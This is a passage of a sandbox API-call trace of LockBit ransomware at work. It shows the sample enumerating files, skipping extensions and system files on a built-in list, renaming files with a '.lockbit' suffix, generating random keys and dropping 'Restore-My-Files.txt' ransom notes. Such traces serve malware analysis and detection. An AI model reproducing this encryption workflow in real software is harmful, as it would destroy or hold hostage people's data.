Office\\CLIPART\\PUB60COR\\SY00132_.WMF") returned=".WMF" [0177.528] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0177.528] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0177.528] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0177.528] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0177.528] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0177.528] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0177.528] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0177.528] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0177.528] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0177.528] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0177.528] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0177.528] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0177.528] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0177.528] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0177.528] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0177.528] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0177.528] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0177.528] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0177.528] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0177.528] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0177.528] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0177.528] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0177.528] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0177.528] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0177.528] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0177.528] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0177.528] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0177.528] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0177.528] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SY00132_.WMF.lockbit") returned 72 [0177.528] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SY00132_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\sy00132_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0177.532] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0177.532] malloc (_Size=0x40068) returned 0x1ff1e60 [0177.532] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=2076) returned 1 [0177.532] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0177.533] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0177.533] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0177.533] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0177.533] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0177.533] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0177.533] ReadFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0177.535] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SY00132_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SY00132_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0177.535] malloc (_Size=0xa6) returned 0x1fa2ed8 [0177.535] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0177.536] free (_Block=0x1fa2ed8) [0177.536] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SY00132_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0177.536] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0177.536] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0177.536] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f34ba00, ftCreationTime.dwHighDateTime=0x1bd4ae3, ftLastAccessTime.dwLowDateTime=0x5aca0270, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6f34ba00, ftLastWriteTime.dwHighDateTime=0x1bd4ae3, nFileSizeHigh=0x0, nFileSizeLow=0x1412, dwReserved0=0x0, dwReserved1=0x0, cFileName="SY00170_.WMF", cAlternateFileName="")) returned 1 [0177.536] lstrcmpiW (lpString1=".", lpString2="SY00170_.WMF") returned -1 [0177.536] lstrcmpiW (lpString1="..", lpString2="SY00170_.WMF") returned -1 [0177.537] PathFindExtensionW (pszPath="SY00170_.WMF") returned=".WMF" [0177.537] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0177.537] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0177.537] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0177.537] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0177.537] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0177.537] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0177.537] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0177.537] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0177.537] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0177.537] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0177.537] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0177.537] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0177.537] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0177.537] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0177.537] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0177.537] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0177.537] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0177.537] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0177.537] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0177.537] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0177.537] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0177.537] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0177.537] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0177.537] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0177.537] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0177.537] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0177.537] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0177.538] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0177.538] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0177.538] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0177.538] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0177.538] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0177.538] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0177.538] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0177.538] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0177.538] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0177.538] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0177.538] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0177.538] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0177.538] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0177.538] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0177.538] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0177.538] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0177.538] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0177.538] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0177.538] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0177.538] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0177.538] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="SY00170_.WMF") returned -1 [0177.538] lstrcmpiW (lpString1="ntldr", lpString2="SY00170_.WMF") returned -1 [0177.538] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="SY00170_.WMF") returned -1 [0177.538] lstrcmpiW (lpString1="bootsect.bak", lpString2="SY00170_.WMF") returned -1 [0177.538] lstrcmpiW (lpString1="autorun.inf", lpString2="SY00170_.WMF") returned -1 [0177.538] lstrcmpiW (lpString1="thumbs.db", lpString2="SY00170_.WMF") returned 1 [0177.538] lstrcmpiW (lpString1="iconcache.db", lpString2="SY00170_.WMF") returned -1 [0177.538] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0177.538] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SY00170_.WMF") returned=".WMF" [0177.538] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0177.539] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0177.539] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0177.539] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0177.539] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0177.539] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0177.539] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0177.539] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0177.539] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0177.539] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0177.539] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0177.539] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0177.539] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0177.539] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0177.539] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0177.539] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0177.539] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0177.539] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0177.539] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0177.539] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0177.539] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0177.539] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0177.539] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0177.539] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0177.539] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0177.539] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0177.539] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0177.539] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0177.539] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SY00170_.WMF.lockbit") returned 72 [0177.540] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SY00170_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\sy00170_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x338 [0177.545] CreateIoCompletionPort (FileHandle=0x338, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0177.545] malloc (_Size=0x40068) returned 0x3df0008 [0177.545] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=5138) returned 1 [0177.545] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0177.545] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0177.545] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0177.545] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0177.546] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0177.546] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0177.546] ReadFile (in: hFile=0x338, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0177.547] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SY00170_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SY00170_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0177.547] malloc (_Size=0xa6) returned 0x1fa2ed8 [0177.547] NtSetInformationFile (FileHandle=0x338, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0177.548] free (_Block=0x1fa2ed8) [0177.549] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SY00170_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0177.549] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0177.549] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0177.549] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3d702300, ftCreationTime.dwHighDateTime=0x1bd4ae4, ftLastAccessTime.dwLowDateTime=0x5aca0270, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x3d702300, ftLastWriteTime.dwHighDateTime=0x1bd4ae4, nFileSizeHigh=0x0, nFileSizeLow=0x50c, dwReserved0=0x0, dwReserved1=0x0, cFileName="SY00560_.WMF", cAlternateFileName="")) returned 1 [0177.549] lstrcmpiW (lpString1=".", lpString2="SY00560_.WMF") returned -1 [0177.549] lstrcmpiW (lpString1="..", lpString2="SY00560_.WMF") returned -1 [0177.549] PathFindExtensionW (pszPath="SY00560_.WMF") returned=".WMF" [0177.549] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0177.549] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0177.549] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0177.549] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0177.549] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0177.549] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0177.549] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0177.549] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0177.549] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0177.549] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0177.549] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0177.549] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0177.549] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0177.549] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0177.549] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0177.549] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0177.549] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0177.549] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0177.549] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0177.550] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0177.550] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0177.550] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0177.550] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0177.550] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0177.550] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0177.550] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0177.550] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0177.550] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0177.550] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0177.550] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0177.550] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0177.550] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0177.550] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0177.550] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0177.550] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0177.550] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0177.550] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0177.550] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0177.550] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0177.550] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0177.550] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0177.550] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0177.550] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0177.550] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0177.550] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0177.550] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0177.550] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0177.550] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="SY00560_.WMF") returned -1 [0177.550] lstrcmpiW (lpString1="ntldr", lpString2="SY00560_.WMF") returned -1 [0177.551] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="SY00560_.WMF") returned -1 [0177.551] lstrcmpiW (lpString1="bootsect.bak", lpString2="SY00560_.WMF") returned -1 [0177.551] lstrcmpiW (lpString1="autorun.inf", lpString2="SY00560_.WMF") returned -1 [0177.551] lstrcmpiW (lpString1="thumbs.db", lpString2="SY00560_.WMF") returned 1 [0177.551] lstrcmpiW (lpString1="iconcache.db", lpString2="SY00560_.WMF") returned -1 [0177.551] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0177.551] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SY00560_.WMF") returned=".WMF" [0177.551] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0177.551] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0177.551] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0177.551] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0177.551] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0177.551] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0177.551] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0177.551] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0177.551] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0177.551] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0177.551] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0177.551] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0177.551] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0177.551] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0177.551] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0177.551] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0177.551] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0177.551] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0177.551] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0177.551] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0177.551] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0177.551] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0177.551] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0177.551] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0177.551] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0177.552] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0177.552] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0177.552] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0177.552] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SY00560_.WMF.lockbit") returned 72 [0177.552] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SY00560_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\sy00560_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0177.553] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0177.553] malloc (_Size=0x40068) returned 0x1ff1e60 [0177.553] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=1292) returned 1 [0177.553] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0177.553] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0177.553] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0177.553] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0177.554] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0177.554] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0177.554] ReadFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0177.558] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SY00560_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SY00560_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0177.558] malloc (_Size=0xa6) returned 0x1fa2ed8 [0177.558] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0177.559] free (_Block=0x1fa2ed8) [0177.559] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SY00560_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0177.559] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0177.559] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0177.559] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd194b700, ftCreationTime.dwHighDateTime=0x1bd4af1, ftLastAccessTime.dwLowDateTime=0x5aca0270, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xd194b700, ftLastWriteTime.dwHighDateTime=0x1bd4af1, nFileSizeHigh=0x0, nFileSizeLow=0x778, dwReserved0=0x0, dwReserved1=0x0, cFileName="SY00642_.WMF", cAlternateFileName="")) returned 1 [0177.559] lstrcmpiW (lpString1=".", lpString2="SY00642_.WMF") returned -1 [0177.559] lstrcmpiW (lpString1="..", lpString2="SY00642_.WMF") returned -1 [0177.559] PathFindExtensionW (pszPath="SY00642_.WMF") returned=".WMF" [0177.559] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0177.559] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0177.559] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 